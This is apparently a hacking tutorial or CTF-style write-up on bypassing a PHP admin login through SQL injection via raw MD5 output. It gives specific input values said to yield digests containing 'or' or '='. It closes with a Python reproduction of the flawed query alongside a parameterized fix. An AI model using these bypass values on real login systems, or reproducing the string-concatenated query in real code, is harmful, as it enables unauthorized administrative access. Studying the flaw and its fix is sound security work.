$row = @mysql_fetch_array(mysql_query("select * from admin_password where password='".md5($ps,true)."'"));

Of course we have no idea what the password is, so we must find a way to bypass this query by SQL injection!

First, take a look at the md5() function definition and its vulnerability:

string md5 ( string $str [, bool $raw_output = false ] )

The string supplied as the first argument is MD5-hashed and returned as a 32-character hex string. The default of $raw_output is false; if it is set to true, the hash is returned as 16 bytes of raw binary instead.
Now we come back to the SQL query:

mysql_query("select * from admin_password where password='".md5($ps,true)."'");

If we can force the raw MD5 output of the password to contain 'or' or '=', we can bypass this query by SQL injection. The query then becomes:

mysql_query("select * from admin_password where password=''OR''");

Example: 'DAD'OR'1=1' → FALSE OR TRUE → TRUE
In this case, 129581926211651571912466741651878684928 is the password that should be sent to the md5 function.
or
mysql_query("select * from admin_password where password=''=''");

Example: 'DAD'='SDSD' → FALSE = FALSE → TRUE
In this case, 9235566 is the password that should be sent to the md5 function.

So in both cases the password comparison evaluates to true and the query returns the admin row!
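As an added illustration (not part of the original post), here is the same flawed query reproduced in Python against an in-memory SQLite stand-in for admin_password, next to a parameterized version that the raw-digest trick cannot bypass. The table layout and the stored password "admin" are assumptions; only the first ('or') case is shown, since the ''='' case depends on MySQL's string-to-number comparison, which SQLite does not share.

```python
import hashlib
import sqlite3

# Assumed fixture (not from the original post): the admin's real password.
REAL_PASSWORD = "admin"
# The page's first value: its raw MD5 digest contains the bytes 'or'.
PAYLOAD = "129581926211651571912466741651878684928"


def md5_raw(s: str) -> bytes:
    """Equivalent of PHP md5($s, true): 16 raw bytes instead of 32 hex chars."""
    return hashlib.md5(s.encode()).digest()


def _fresh_db() -> sqlite3.Connection:
    # Constructed in-memory stand-in for the admin_password table; the raw
    # digest is stored as text, mirroring what the PHP code writes.
    db = sqlite3.connect(":memory:")
    db.execute("create table admin_password (password text)")
    db.execute("insert into admin_password values (?)",
               (md5_raw(REAL_PASSWORD).decode("latin-1"),))
    return db


def vulnerable_login(ps: str) -> bool:
    """The page's query: raw digest bytes spliced straight into the SQL text.
    A quote byte (0x27) in the digest ends the string literal early, so the
    bytes 'or'8 turn the WHERE clause into  password='...' or '8'  (true)."""
    raw = md5_raw(ps).decode("latin-1")   # PHP concatenates the same bytes
    sql = "select * from admin_password where password='" + raw + "'"
    return _fresh_db().execute(sql).fetchone() is not None


def hardened_login(ps: str) -> bool:
    """Bind the digest as a parameter: bytes inside it can never become SQL.
    (Unsalted MD5 remains a weak password store; this only closes the injection.)"""
    sql = "select * from admin_password where password = ?"
    row = _fresh_db().execute(sql, (md5_raw(ps).decode("latin-1"),)).fetchone()
    return row is not None


def digest_has_quote(ps: str) -> bool:
    """Defender check: does this raw digest contain the byte that breaks the literal?"""
    return b"'" in md5_raw(ps)
```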
HAPPY HACKING!